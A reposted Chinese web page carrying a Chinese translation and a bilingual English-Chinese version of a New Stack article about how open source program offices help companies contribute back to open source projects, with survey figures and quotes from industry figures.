[路径分隔符在Windows Linux ...]的搜索结果

...目里致命的缺陷。 拿Linux来说，这个开源操作系统在全球前100万台服务器中运行率在96%以上，且这些服务器90%的云基础设施也都在Linux上。更不用说世界上85%的智能手机都运行着Linux，即Android操作系统。 这些常见开源项目的列表还在逐渐增加着。 所以没有开源，今天的大部分技术基础设施的建设也将会戛然而止。 “这是一个很现实的问题”，Data.org的执行董事Danil Mikhailov说，该组织是由万事达包容性发展中心和洛克菲勒基金会支持，旨在促进使用数据科学来应对当今社会所面临的巨大挑战的非营利性组织。 虽然几乎所有组织都在使用着开源软件，但只有少数组织为这些项目作出了贡献。The New Stack、Linux Foundation Research 和 TODO Group 在 9 月发布的一项调查中，42% 的参与者表示，他们至少有时会为开源项目做出贡献。 而同一项研究表明，只有36%的组织会培训他们的工程师为开源作出贡献。 个体公司应该支持贡献这些他们使用最多且对他们成功至关重要的项目，Mikhailov认为：“如果你使用开源，你就应该为他做出属于你自己的贡献。” Part2OSPO的好处：更少的技术负债，更好的招聘效果 参与开源社区----特别是在内部开源计划办公室（OSPO）的指导下----不仅可以保证对组织成功至关重要项目的健康发展，还可以提高项目安全性，同时可以允许工程师在项目发展规划中起到更大的作用。 例如，如果一家公司使用了开源工具，并对其进行了一些调整使其变得更好。但如果这项改进没有反馈到开源社区，那么开源项目的正式版本就会一开始与该公司所使用的版本有所不同。 “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多。而这些差异是以天为单位迅速增长的。”VMware 开源营销和战略总监 Suzanne Ambiel 表示，“所以你很快就会变成一个开源项目里独一无二变体的‘自豪’用户和维护人员。” “如果技术负债越来越多，那么公司的管理成本则会非常昂贵”。 实际上对于开源活动的支持也变成了一种招聘途径。“这真是一块吸引人才的磁铁，”Ambiel说，“这也是新员工所寻求的“。 她还提到，一些工程经理可能会对贡献开源而减损核心产品的开发的精力而感到担忧。她补充到，他们的理由有可能是这样的：“我只有有限的才华与时间，且我需要这些只做我认为可以处理且看到投资回报的事情。” 但她说，这是一种鼠目寸光的态度。支持开源社区并且作出贡献的员工，可以从中培养技能与增长才干。 云安全供应商 Sysdig 的首席技术官兼创始人 Loris Degionni 也赞同这一观点：“找到为开源做出贡献的员工无疑就找到一座金矿，”他说。 他认为，这些参与开源的员工更具备公司想拥有的竞争力并将一些功能融入至社区所支持的标准中。且在人才争夺战中，拥抱开源的公司也更受到开发人员的青睐。 “最后，开源项目是由你可能无法聘请的技术专家社区推动的”，他说，“当员工积极参与并于这些专家合作时，他们将能更好地深入这些顶级的实践，并将这些收获带回到你的组织之中。” “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多...所以你很快就会变成一个开源项目里独一无二变体的”自豪“用户和维护人员。”— Suzanne Ambiel，VMware 开源营销和战略总监 “但是这一切终究不会白费--开发人员不应该把空闲时间用在磨练他们的技能上，因为你的公司很快就会在他们的努力中看到好处。” Degionni认为，OSPO（开源计划办公室）可以帮助公司实现这些目标，以及帮助确定贡献的优先级并确保合作的进行。除此之外，他们也可以对公司内部开发应用程序方面的治理提供相关帮助。 “开源团队的成员也可以成为开源技术的伟大内部传播者，并充当组织与更广泛社区之间的桥梁。”他补充道。 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月调查中，近 53% 的拥有 OSPO的组织表示，由于拥有了OSPO，他们看到了更多创新，而近 43% 的组织表示，他们在外部开源项目的参与度上有所增加。 Part3更多OSPO的好处：商业优势 网络安全公司 ThreatX 的首席创新官 Tom Hickman 表示，为开源社区做出贡献，不仅有助于社区，还有助于为社区做出贡献的公司。 “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与”，他说，“这可以变成一个良性循环。” 此外，根据哈佛商学院的研究，为开源项目作出贡献的公司从使用开源的项目中获得的生产价值，是不参与开源项目公司的两倍。 Cloud Native Computing Foundation 的首席技术官 Chris Aniszczyk 说，世界上许多巨头公司都为开源作出了贡献。他还提到，开源贡献者的指数是作为公司是否有所作为的参考。 科技巨头占据了这份榜单的主导地位：谷歌、微软、红帽、英特尔、IBM、亚马逊、Facebook、VMware、GitHub 和 SAP 依次是排名前 10 的贡献者。但Aniszczyk 表示，但也有很多终端用户公司进入前 100 名，包括 Uber、BBC、Orange、Netflix 和 Square。 “我们一直知道，在上游项目中工作不仅仅是关正确与否----它是开源软件开发的最佳方法，也是向客户提供开源福利的最佳方式”他说，“很高兴看到IT领导者们也认识到了这一点。” 为了和这些公司一起作出贡献，公司也需要有自己的开源策略，而拥有一个开源计划办公室则可以为其提供帮助。 “在使用开源软件方面，OPSO为公司提供了一个至关重要的能力中心”他说。 这与公司拥有安全运营中心的方式类似，他说。 “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与，这可以变成一个良性循环。” ——Tom Hickman，ThreatX 首席创新官 “如果你对安全团队进行相应投资，你通常是不会期望你的软件是安全的，也无法及时应对安全事件。”他说。 “同样的逻辑也适用于 OSPO，这就是为什么你会看到许多领先的公司，例如Apple、Meta、Twitter、Goldman Sachs、Bloomberg 和 Google 都拥有 OSPO。他们走在了趋势的前面。” 而对组织内的开源活动的支持态度亦可成为软件供应商们的差异化原因与营销的机会。 根据Red Hat 2月分发布的一项调查，82%的IT领导者更倾向于选择为开源社区作出贡献的软件供应商。 受访者表示，当供应商支持开源社区时，就表示着他们更熟悉开源的流程并且在客户遇到技术难题时会更加有效。 但收益的不仅仅是软件供应商们。 根据 The New Stack、Linux Foundation Research 和 TODO Group 9 月份的调查，57% 拥有 OSPO 的组织将使用它们来进一步发展战略关系和建立合作伙伴关系。 十年前，Mark Hinkle 在 Citrix 工作时创办了一个开源计划办公室。他指出了在内部拥有一个 OSPO将如何使公司受益。 “对于我们来说，最大的工作是让不熟悉开源的员工学会并参与其中，成为优秀的社区成员”，他说，“我们还就如何确保我们的IP不会在没有正确理解的情况下进入项目的情况提供了指导，并确保我们没有与我们企业软件许可相冲突的开源项目合作。” 他说，OSPO还帮助Citrix确定了公司参与开源项目和Linux基金会等贸易组织的战略机会。 如今，他是云原生开源集成平台 TriggerMesh 的首席执行官兼联合创始人。 他说，参与开源系统对公司来说有着重大的经济效益。 “我们参与Knative是为了分享我们基础底层平台的开发，但作为业务的一部分，我们也拥有相关的增值服务。”他说，“通过共享该平台的研发，这为我们提供了更多的资源来改进我们自己的差异化技术。” Part4如何入门开源 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月份调查中，有 63% 的公司表示，拥有OSPO 对其工程或产品团队的成功至关重要，高于上一年度该项研究数据的 54%。 其中77% 的人表示他们的开源程序对他们的软件实践产生了积极影响，例如提高了代码质量。 但公司也不可能总是为他们使用的每一个开源项目而花费精力。 “首先，节流一下”，VMware 的 Ambiel 建议道。 公司应该关注投入使用中最有意义的项目。而这也是OSPO可以帮助确定优先事项并确保技术与战略一致性的领域。 之后，开发人员应该自己去了解一下。项目通常提供相关在线文档，一般包含贡献着指南、治理文档和未解决问题列表。 “对于那些你较感兴趣的项目中，你可以介绍一下自己----打个招呼”，她说。“然后转到Slack频道或者分发列表，询问他们需要帮助的地方。也许他们不需要帮助，一切完好；又或者他们也有可能使用新人来审查核验代码。” Ambiel 说，开源计划办公室不仅可以帮助制定为开源社区做出贡献的商业案例，还可以帮助公司以安全、可靠和健全的方式来做这件事。 “如果我为一家公司工作，并想为开源做出贡献，我不想意外披露、泄露或破坏任何专利，”她说。“而OSPO可以帮助您做出明智的选择。” 她说，OSPO还可以在开源方面提供领导力和指导理念的支持。“它可以提供引领、指导、辅导和最佳实践的作用。” Aqua Security的开发人员倡导者Anaïs Urlichs则认为，支持开源的承诺必须从高层开始。 她说，“公司在多数时候往往不重视对开源的投资，所以员工自然而然不被鼓励对此作出贡献。” 在这些情况下，员工对于开源的热情也会在空闲时间里对开源的建设而消散殆尽，这对于开源的发展来说是不可持续的。 “如果公司对开源项目依赖度高，那么将开源贡献纳入工程师的日程安排是很重要的，”她说。“一些公司定义了员工可以为开源建设的时间百分比，将其作为他们正常工作日的一部分。” The New Stack 是 Insight Partners 的全资子公司，Insight Partners 是本文提到的以下公司的投资者：Sysdig、Aqua Security。 中英对照版 How an OSPO Can Help Your Engineers Give Back to Open Source OSPO （开源项目办公室）是如何使工程师回馈开源的 When it comes to open source software, there’s a big and growing problem: most organizations are takers, not givers. 谈到开源软件，有一个较大且日益严重的问题：大多数组织都是索取者，而不是给予者。 There’s a classic XKCD comic that shows a giant structure representing modern digital infrastructure, dependent on a tiny component created by “some random person in Nebraska” who has been “thanklessly maintaining since 2003.” 经典漫画XKCD展示了一个代表现代数字基础设施的巨大结构，它依赖于“内布拉斯加州的某位人士”创建的微小组件，该组件“自2003年来一直都处于吃力不讨好的状态”。 Randall Monroe’s XKCD comic illustrates the open source dilemma: overreliance on a small number of volunteer project maintainers. Randall Monroe 的XKCD漫画展示了目前开源面临的窘境：过度依赖少数项目维护志愿者的志愿服务。 This would have been funny, except that this is exactly what happened when security vulnerabilities were discovered in Log4j last December. （开源项目由志愿者自发来维护，）这听起来像是一件很滑稽的事情，但事实上去年十二月在Log4j中发现的安全漏洞也确实存在着上述情况。 The Java-based logging tool is ubiquitous in enterprise publications. In the last three months, for example, Log4j has been downloaded more than 30 million times, according to a report by the enterprise software company Sonatype. 然而这个基于Java的日志记录工具已经在企业内部刊物中无处不在。例如根据软件公司Sonatype的一份报告显示，在过去的三个月里，Log4j的下载量就已经超过3000万次。 The tool has 440,000 lines of code, according to Synopsys‘ Black Duck Open Hub research tool, with nearly 24,000 contributions by nearly 200 developers. That’s a large dev team compared to other open source projects. But looking closer at the numbers, more than 70% of commits were by just five people. 根据Synopsys(新思）公司旗下的Black Duck Open Hub 研究工具显示。Log4j有着440,000行代码，由近200名开发人员贡献了将近24,000行代码。其实与其他开源项目相比，这是一个庞大的开发团队。但是如果关注数据的话，就会发现超过70%的提交是仅仅靠五个人来完成的。 Log4j’s home page lists about a dozen members on its project team. Most projects have far fewer developers working on them — and that presents a problem for the organizations that depend on them. Log4j的主页上展示了十几位项目团队的成员。而大多项目的开发人员要比其原本需要的少得多----这是高度依赖开发人员团队所呈现出来的问题。 “There is little incentive for anyone today to contribute to an existing open source project,” said Jeremy Stretch, distinguished engineer at NS1, a DNS network company. “There’s usually no direct compensation, and few accolades are offered — most users don’t even know who maintains the software that they use.” “如今的人没有什么动力去为现有的开源项目做贡献”，来自DNS网络公司NS1的杰出工程师Jeremy Strech说，“因为通常来说，这没有直接的物质回报，也很少提供荣誉----大多数用户甚至不知道他们所用的软件是谁维护的。” The most common motivation among open source contributors is to add a feature that they themselves want to see, he said. “Once this has been achieved, the contributor rarely sticks around.” 他说，开源贡献者们最常见的动机就是添加他们自己想要的功能。“一旦实现了这一点，他们几乎都不会留下来。” Meanwhile, as a project becomes more popular, the burden on the core team of maintainers keeps increasing. 与此同时，随着项目的逐渐流行，对于维护方面的核心团队来说，他们的负担也在不断增加。 “More users means more feature requests and more bug reports — but not more maintainers,” Stretch said. “What was once an enjoyable hobby can quickly become a tedious chore, and many maintainers understandably opt to simply abandon their projects altogether.” “更多的用户意味有着更多的功能需求和错误报告----但不是更多的维护人员”，Stretch说。“曾经令人愉快的爱好很快就会变成一项乏味的项目，所以很多维护人员选择干脆完全放弃他们的项目，这也是可以理解的。” Part1The Tragedy of the Commons The open source software ecosystem is a perfect example of the “tragedy of the commons.” 开源软件的生态系统，就是“公地悲剧”的一个完美例子。 And the tragedy is — when everyone uses, but no one contributes, that resource — whether it’s an overrun park or an open source project — eventually collapses from overuse and underinvestment. Everyone loves using free stuff, but everyone expects someone else to take care of it. 这个悲剧就是---当一种资源，无论是一个超限的公园还是一个开源项目，所有人都在使用而没有人贡献之时，最终都会因为过度使用和投入不足而崩溃坍塌。 This approach can save you money in the short term, but it can become a fatal flaw over time. Especially since open source software is everywhere, running everything. 这种方式可以在短期内为你节省资金，但随着时间的推移，它可能会变成项目里致命的缺陷。 Linux, for example, the open source operating system, runs on 96% of the world’s top 1 million servers, and 90% of all cloud infrastructure is on Linux. Not to mention that 85% of all smartphones in the world run Linux, in the form of the Android OS. 拿Linux来说，这个开源操作系统在全球前100万台服务器中运行率在96%以上，且这些服务器90%的云基础设施也都在Linux上。更不用说世界上85%的智能手机都运行着Linux，即Android操作系统。 Then there’s Java, Apache, WordPress, Cassandra, Hadoop, MySQL, PHP, ElasticSearch, Kubernetes — the list of ubiquitous open source projects goes on and on. 还有Java, Apache, WordPress, Cassandra, Hadoop, MySQL, PHP, ElasticSearch, Kubernetes--这些常见开源项目的列表还在逐渐增加着。 Without open source, much of today’s technical infrastructure would immediately grind to a halt. 如果没有开源，今天的大部分技术基础设施的建设也将会戛然而止。 “It is a real problem,” said Danil Mikhailov, executive director at Data.org, a nonprofit backed by the Mastercard Center for Inclusive Growth and The Rockefeller Foundation that promotes the use of data science to tackle society’s greatest challenges. “这是一个很现实的问题”，Data.org的执行董事Danil Mikhailov说，该组织是由万事达包容性发展中心和洛克菲勒基金会支持，旨在促进使用数据科学来应对当今社会所面临的巨大挑战的非营利性组织。 While nearly all organizations use open source software, only a minority contribute to those projects. Forty-two percent of participants in a survey released in September by The New Stack, Linux Foundation Research, and the TODO Group said tthey contribute at least sometimes to open source projects. 虽然几乎所有组织都在使用着开源软件，但只有少数组织为这些项目作出了贡献。The New Stack、Linux Foundation Research 和 TODO Group 在 9 月发布的一项调查中，42% 的参与者表示，他们至少有时会为开源项目做出贡献。 The same study showed that only 36% of organizations train their engineers to contribute to open source. 而同一项研究表明，只有36%的组织会培训他们的工程师为开源作出贡献。 Individual companies should support projects that they use the most and are critical to their success, Mikhailov said: “If you use, you contribute.” 个体公司应该支持贡献这些他们使用最多且对他们成功至关重要的项目，Mikhailov认为：“如果你使用开源，你就应该为他做出属于你自己的贡献。” Part2OSPO Benefits:Less Tech Debt,Better Recruiting Participating in open source communities — especially when guided by an in-house open source program office (OSPO) — can help ensure the health of projects critical to your organization’s success, improve those projects’ security, and allow your engineers to have more impact in the projects’ development road map. 参与开源社区——特别是在内部开源项目办公室（OSPO）的指导下——不仅可以保证对组织成功至关重要项目的健康发展，还可以提高项目安全性，同时可以允许工程师在项目发展规划中起到更大的影响。 Say, for example, a company uses an open source tool and modifies it a little to make it better. If that improvement isn’t contributed back to the community, then the official version of the open source project will start to diverge from what the company is using 例如，如果一家公司使用了开源工具，并对其进行了一些调整使其变得更好。但如果这项改进没有反馈到开源社区，那么开源项目的正式版本就会一开始与该公司所使用的版本有所不同。 “You start to grow technical debt because when the original source changes and you’ve got a different version. Those differences grow rapidly, compounding daily. It doesn’t take long for you to be the proud user and maintainer of a one-of-a-kind open source project variant,” said Suzanne Ambiel, director, open source marketing and strategy at VMware. “当原始代码来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多。而这些差异是以天为单位迅速增长的。”VMware 开源营销和战略总监 Suzanne Ambiel 表示，“所以你很快就会变成一个开源项目里独一无二变体的‘自豪’用户和维护人员。” “The technical debt gets bigger and bigger and it gets very expensive for a company to manage.” “如果技术负债越来越多，那么公司的管理成本则会非常昂贵”。 Support for open source activity can also be a recruiting tool. “It’s really a talent magnet,” said Ambiel. “It’s one of the things that new hires look for.” 实际上对于开源活动的支持也变成了一种招聘途径。“这真是一块吸引人才的磁铁，”Ambiel说，“这也是新员工所寻求的“。 Some engineering managers might worry that open source contributions will detract from core product development, she said. Their rationale, she added, might run along the lines of, “I only have so much talent, and so many hours, and I need them to only work on things where I can measure and see the return on investment.” 她还提到，一些工程经理可能会对贡献开源而减损核心产品的开发的精力而感到担忧。她补充到，他们的理由有可能是这样的：“我只有有限的才华与时间，且我需要这些只做我认为可以度量且看到投资回报的事情。” But that attitude, she said, is shortsighted. Supporting employees who contribute to open source communities can build skills and develop talent, she said. 但她说，这是一种鼠目寸光的态度。支持开源社区并且作出贡献的员工，可以从中培养技能与增长才华。 Loris Degionni, chief technology officer and founder at Sysdig, a cloud security vendor, echoed this notion: “Finding employees who contribute to open source is a gold mine,” said. 云安全供应商 Sysdig 的首席技术官兼创始人 Loris Degionni 也赞同这一观点：“找出为开源做出贡献的员工无疑就找到一座金矿，”他说。 These employees are more capable of delivering features a company wants to use and merge them into community-supported standards, he said. And in a war for talent, companies that embrace open source are more attractive to developers. 他认为，这些参与开源的员工更具备公司想拥有的竞争力并将一些功能融入至社区所支持的标准中。且在人才争夺战中，拥抱开源的公司也更受到开发人员的青睐。 “Lastly, open source is driven by a community of technical experts you may not be able to hire,” he said. “When employees actively contribute and collaborate with these experts, they’ll be better informed of best practices and bring them back to your organization. “最后，开源项目是由你可能无法聘请的技术专家社区推动的”，他说，“当员工积极参与并于这些专家合作时，他们将能更好地深入这些最佳实践，并将这些收获带回到你的组织之中。” “You start to grow technical debt because when the original source changes and you’ve got a different version … It doesn’t take long for you to be the proud user and maintainer of a one-of-a-kind open source project variant.” —Suzanne Ambiel, director, open source marketing and strategy, VMware “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多...所以你很快就会变成一个开源项目里独一无二变体的”自豪“用户和维护人员。” — Suzanne Ambiel，VMware 开源营销和战略总监 “All of this should be rewarded — developers shouldn’t have to spend their free time honing their skills, as your company will quickly see benefits from their efforts.” “但是这一切终究不会白费--开发人员不应该把业余时间用在磨练他们的技能上，因为你的公司很快就会在他们的努力中看到好处。” An OSPO, Degionni suggested, can help achieve these goals, as well as help prioritize contributions and ensure collaboration. In addition, they can help provide governance that mirrors what companies would have for internally developed applications. Degionni认为，OSPO（开源计划办公室）可以帮助公司实现这些目标，以及帮助确定贡献的优先级并确保合作的进行。除此之外，他们也可以对公司内部开发应用程序方面的治理提供相关帮助。 “Members of the open source team are also in a position to be great internal evangelists for open source technologies, and act as bridges between the organization and the broader community,” he added. “开源团队的成员也可以成为开源技术的伟大内部布道师，并充当组织与更广泛社区之间的桥梁。”他补充道。 In the September survey from The New Stack, Linux Foundation Research and the TODO Group, nearly 53% of organizations with OSPOs said they saw more innovation as a result of having an OSPO, while almost 43% said they saw increased participation in external open source projects. 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月调查中，近 53% 的拥有 OSPO的组织表示，由于拥有了OSPO，他们看到了更多创新，而近 43% 的组织表示，他们在外部开源项目的参与度上有所增加。 Part3More OSPO Benefits:A Business Edge Contributing to open source communities doesn’t just help the communities, but the companies that contribute to them, said Tom Hickman, chief innovation officer at ThreatX, a cybersecurity firm. 网络安全公司 ThreatX 的首席创新官 Tom Hickman 表示，为开源社区做出贡献，不仅有助于社区，还有助于为社区做出贡献的公司。 “Growing the community of developers around a project helps the code base, and attracts more developers,” he said. “It can become a virtuous circle.” “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与”，他说，“这可以变成一个良性循环。” Also, companies that contribute to open source projects get twice the productive value from their use of open source than companies that don’t, according to research by Harvard Business School. 此外，根据哈佛商学院的研究，为开源项目作出贡献的公司从使用开源的项目中获得的生产价值，是不参与开源项目公司的两倍。 Many of the biggest companies in the world are contributing to open source, said Chris Aniszczyk, chief technology officer at Cloud Native Computing Foundation. He pointed to the Open Source Contributor Index as a reference for exactly just how much companies are doing. Cloud Native Computing Foundation 的首席技术官 Chris Aniszczyk 说，世界上许多巨头公司都为开源作出了贡献。他还提到，开源贡献者的指数是作为公司是否有所作为的参考。 The tech giants dominate the list: Google, Microsoft, Red Hat, Intel, IBM, Amazon, Facebook, VMware, GitHub and SAP are the top 10 contributors, in that order. But there are also a lot of end users on the top 100 list, said Aniszczyk, including Uber, the BBC, Orange, Netflix, and Square. 科技巨头占据了这份榜单的主导地位：谷歌、微软、红帽、英特尔、IBM、亚马逊、Facebook、VMware、GitHub 和 SAP 依次是排名前 10 的贡献者。但Aniszczyk 表示，但也有很多终端用户公司进入前 100 名，包括 Uber、BBC、Orange、Netflix 和 Square。 “We’ve always known working in upstream projects is not just the right thing to do —it’s the best approach to open source software development and the best way to deliver open source benefits to our customers,” he said. “It’s great to see that IT leaders recognize this as well.” “我们一直知道，在上游项目中工作不仅仅是关正确与否----它是开源软件开发的最佳方法，也是向客户提供开源福利的最佳方式“他说，“很高兴看到IT领导者们也认识到了这一点。” To contribute alongside these giants, companies need to have their own open source strategies, and having an open source program office can help. 为了和这些公司一起作出贡献，公司也需要有自己的开源策略，而拥有一个开源项目办公室则可以为其提供帮助。 “OSPOs provide a critical center of competency in a company when it comes to utilizing open source software,” he said. “在使用开源软件方面，OPSO为公司提供了一个至关重要的能力中心”他说。 It’s similar to the way that companies have security operations centers, he said. 这与公司拥有安全运营中心的方式类似，他说。 “Growing the community of developers around a project helps the code base, and attracts more developers. It can become a virtuous circle.” —Tom Hickman, chief innovation officer, ThreatX “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与，这可以变成一个良性循环。” ——Tom Hickman，ThreatX 首席创新官 “If you don’t make the investment in a security team, you generally don’t expect your software to be secure or be able to respond to security incidents in a timely fashion,” he said. “如果你没有对安全团队进行相应投资，你通常是不会期望你的软件是安全的，也无法及时响应安全事件。”他说。 “The same logic applies to OSPOs and is why you see many leading companies out there such as Apple, Meta, Twitter, Goldman Sachs, Bloomberg, and Google all have OSPOs. They are ahead of the curve.” “同样的逻辑也适用于 OSPO，这就是为什么你会看到许多领先的公司，例如 Apple、Meta、Twitter、Goldman Sachs、Bloomberg 和 Google 都拥有 OSPO。他们走在了趋势的前面。” Support for open source activity within your organization can become a differentiator and marketing opportunity for software vendors. 而对组织内的开源活动的支持态度亦可成为软件供应商们的差异化原因与营销的机会。 According to a Red Hat survey released in February, 82% of IT leaders are more likely to select a vendor who contributes to the open source community. 根据Red Hat2月分发布的一项调查，82%的IT领导者更倾向于选择为开源社区作出贡献的软件供应商。 Respondents said that when vendors support open source communities they are more familiar with open source processes and are more effective if customers have technical challenges. 受访者表示，当供应商支持开源社区时，就表示着他们更熟悉开源的流程并且在客户遇到技术难题时会更加有效。 But it’s not just software vendors who benefit. 但收益的不仅仅是软件供应商们。 According to September’s survey by The New Stack, Linux Foundation Research, and the TODO Group, 57% of organizations with OSPOs use them to further strategic relationships and build partnerships. 根据 The New Stack、Linux Foundation Research 和 TODO Group 9 月份的调查，57% 拥有 OSPO 的组织将使用它们来进一步发展战略关系和建立合作伙伴关系。 Mark Hinkle started an open source program office back when he worked at Citrix a decade ago. He pointed out how having an OSPO in-house benefited the company. 十年前，Mark Hinkle 在 Citrix 工作时创办了一个开源计划办公室。他指出了在内部拥有一个 OSPO将如何使公司受益。 “For us the biggest job was to educate our employees who weren’t familiar with open source to get involved and be good community members,” he said. “We also provided guidance on how to make sure our IP didn’t enter projects without proper understanding and we made sure we didn’t incorporate open source that conflicted with our enterprise software licensing.” “对于我们来说，最大的工作是让不熟悉开源的员工学会并参与其中，成为优秀的社区成员”，他说，“我们还就如何确保我们的IP不会在没有正确理解的情况下进入项目的情况提供了指导，并确保我们没有与我们企业软件许可相冲突的开源项目合作。” The OSPO also helped Citrix identify strategic opportunities for the company to participate in open source projects and trade organizations like The Linux Foundation, he said. 他说，OSPO还帮助Citrix确定了公司参与开源项目和Linux基金会等贸易组织的战略机会。 Today, he’s the CEO and co-founder of TriggerMesh, a cloud native, open source integration platform. 如今，他是云原生开源集成平台 TriggerMesh 的首席执行官兼联合创始人。 There are some significant economic benefits to participating in the open source ecosystem, he said. 他说，参与开源系统对公司来说有着重大的经济效益。 “We participate in Knative to share the development of our underlying platform but we develop value-added services as part of our business,” he said. “By sharing the R and D for the platform, it gives us more resources to develop our own differentiated technology.” “我们参与Knative是为了分享我们基础底层平台的开发，但作为业务的一部分，我们也拥有相关的增值服务。”他说，“通过共享该平台的研发，这为我们提供了更多的资源来改进我们自己的差异化技术。” Part4How to Get Started in Open Source Sixty-three percent of companies in the September survey from The New Stack, Linux Foundation Research and the TODO Group said that having an OSPO was very or extremely critical to the success of their engineering or product teams, up from 54% in the previous annual study. 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月份调查中，有 63% 的公司表示，拥有OSPO 对其工程或产品团队的成功至关重要，高于上一年度该项研究数据的 54%。 In particular, 77% said that their open source program had a positive impact on their software practices, such as improved code quality. 其中77% 的人表示他们的开源程序对他们的软件实践产生了积极影响，例如提高了代码质量。 But companies can’t always contribute to every single open source project that they use. 但公司也不可能总是为他们使用的每一个开源项目而花费精力。 “First, thin the herd a little bit,” advised VMware’s Ambiel. “首先，节流一下”，VMware 的 Ambiel 建议道。 Companies should look at the projects that make the most sense for their use cases. This is an area where an OSPO can help set priorities and ensure technical and strategic alignment. 公司应该关注投入使用中最有意义的项目。而这也是OSPO可以帮助确定优先事项并确保技术与战略一致性的领域。 Then, developers should go and check out the projects themselves. Projects typically offer online documentation, often with contributor guides, governance documents, and lists of open issues. 之后，开发人员应该自己去了解一下。项目通常提供相关在线文档，一般包含贡献着指南、治理文档和未解决问题列表。 “For the projects that rise to the top of your strategic list, introduce yourself — say hello,” she said. “Go to the Slack channel or the distribution list and ask where they need help. Maybe they don’t need help and everything is good. Or maybe they can use a new person to review code.” “对于那些上升到你的战略清单顶端的项目，你可以介绍一下自己----打个招呼”，她说。“然后转到Slack频道或者分发列表，询问他们需要帮助的地方。也许他们不需要帮助，一切完好；又或者他们也有可能使用新人来审查核验代码。” An open source program office can not only help make a business case for contributing to the open source community, Ambiel said, but can help companies do it in a way that’s safe, secure and sound. Ambiel 说，开源项目办公室不仅可以帮助制定为开源社区做出贡献的商业案例，还可以帮助公司以安全、可靠和健全的方式来做这件事。 “If I work for a company and want to contribute to open source, I don’t want to accidentally disclose, divulge or undermine any patents,” she said. “An OSPO helps you make smart choices.” “如果我为一家公司工作，并想为开源做出贡献，我不想意外披露、泄露或破坏任何专利，”她说。“而OSPO可以帮助您做出明智的选择。” An OSPO can also help provide leadership and the guiding philosophy about supporting open source, she said. “It can provide guidance, mentorship, coaching and best practices.” 她说，OSPO还可以在开源方面提供领导力和指导理念的支持。“它可以提供引领、指导、辅导和最佳实践的作用。” Commitment to support open source has to start at the top, said Anaïs Urlichs, developer advocate at Aqua Security. Aqua Security的开发人员倡导者Anaïs Urlichs则认为，支持开源的承诺必须从高层开始。 “Too often,” she said, “companies do not value investment into open source, so employees are not encouraged to contribute to it.” 她说，“公司在多数时候往往不重视对开源的投资，所以员工自然而然不被鼓励对此作出贡献。” In those cases, employees with a passion for open source end up contributing during their free time, which is not sustainable. 在这些情况下，员工对于开源的热情也会在空闲时间里对开源的建设而消散殆尽，这对于开源的发展来说是不可持续的。 “If companies rely on open source projects, it is important to make open source contributions part of an engineer’s work schedule,” she said. “Some companies define a time percentage that employees can contribute to open source as part of their normal workday.” “如果公司对开源项目依赖度高，那么将开源贡献纳入工程师的日程安排是很重要的，”她说。“一些公司定义了员工可以为开源建设的时间百分比，将其作为他们正常工作日的一部分。” The New Stack is a wholly owned subsidiary of Insight Partners, an investor in the following companies mentioned in this article: Sysdig, Aqua Security. The New Stack 是 Insight Partners 的全资子公司，Insight Partners 是本文提到的以下公司的投资者：Sysdig、Aqua Security。 相关阅读 | Related Reading 《开源合规指南（企业篇）》正式发布，为推动我国开源合规建设提供参考 “目标->用户->指标”——企业开源运营之道｜瞰道@谭中意 开源之夏邀请函——仅限高校学子开启 开源社简介 开源社成立于 2014 年，是由志愿贡献于开源事业的个人成员，依 “贡献、共识、共治” 原则所组成，始终维持厂商中立、公益、非营利的特点，是最早以 “开源治理、国际接轨、社区发展、开源项目” 为使命的开源社区联合体。开源社积极与支持开源的社区、企业以及政府相关单位紧密合作，以 “立足中国、贡献全球” 为愿景，旨在共创健康可持续发展的开源生态，推动中国开源社区成为全球开源体系的积极参与及贡献者。 2017 年，开源社转型为完全由个人成员组成，参照 ASF 等国际顶级开源基金会的治理模式运作。近八年来，链接了数万名开源人，集聚了上千名社区成员及志愿者、海内外数百位讲师，合作了近百家赞助、媒体、社区伙伴。 本篇文章为转载内容。原文链接：https://blog.csdn.net/kaiyuanshe/article/details/124976824。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

